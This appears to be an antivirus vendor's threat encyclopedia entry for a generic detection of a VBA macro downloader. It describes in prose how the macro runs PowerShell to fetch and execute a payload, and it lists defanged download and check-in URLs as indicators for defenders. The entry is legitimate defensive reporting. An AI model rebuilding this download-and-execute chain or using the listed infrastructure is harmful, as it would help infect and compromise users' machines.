VBA/Agent.EZS!tr.dldr
Analysis
VBA/Agent.EZS!tr.dldr is a generic detection for a Macro/PowerShell Downloader Trojan.
Since this is a generic detection, this malware may have varying behaviour.
Below are some of the observed characteristics/behaviours for this infection:
- This malicious document issues a powershell command line that may download from any of the remote site listed below, then usually saves it as %AppData%\[Random].exe, afterwhich executes it.
- hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc
- hxxp://adojqnwdiqzxcqwdqw{Removed}.com/TZ/goblin.pyc
- hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc
- hxxp://adojqnwdiqzxcqwdqw{Removed}.com/TZ/goblin.pyc
- hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc
- hxxp://arniytreegoogofasti{Removed}.com/TZ/mnxok.pyc
- hxxp://apjbqjasdqeee{Removed}.com/XL/trond.pyc
- hxxp://arniytreegoogofasti{Removed}.com/TZ/mnxok.pyc
- hxxp://bccxgddsiugj{Removed}.com/TZ/itnask.pyc
- hxxp://apjbqjasdqeee{Removed}.com/XL/tronc.pyc
- This malware was also observed to connect to the same site but using the following URL:
- hxxp://kkduacizhbadqw{Removed}.com/s.php?id=itron
- hxxp://adojqnwdiqzxcqwdqw{Removed}.com/s.php?id=goblin
- hxxp://kkduacizhbadqw{Removed}.com/s.php?id=itron
- hxxp://adojqnwdiqzxcqwdqw{Removed}.com/s.php?id=goblin
- hxxp://kkduacizhbadqw{Removed}.com/s.php?id=itron
- hxxp://arniytreegoogofasti{Removed}.com/s.php?id=mnxok
- hxxp://apjbqjasdqeee{Removed}.com/s.php?id=trond
- hxxp://arniytreegoogofasti{Removed}.com/s.php?id=mnxok
- hxxp://bccxgddsiugj{Removed}.com/s.php?id=itnask
- hxxp://apjbqjasdqeee{Removed}.com/s.php?id=tronc
- Below are illustrations of infected document(s):
- Figure 1: Infected document.
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extended | |
FortiClient | |
FortiMail | |
FortiSandbox | |
FortiWeb | |
Web Application Firewall | |
FortiIsolator | |
FortiDeceptor | |
FortiEDR |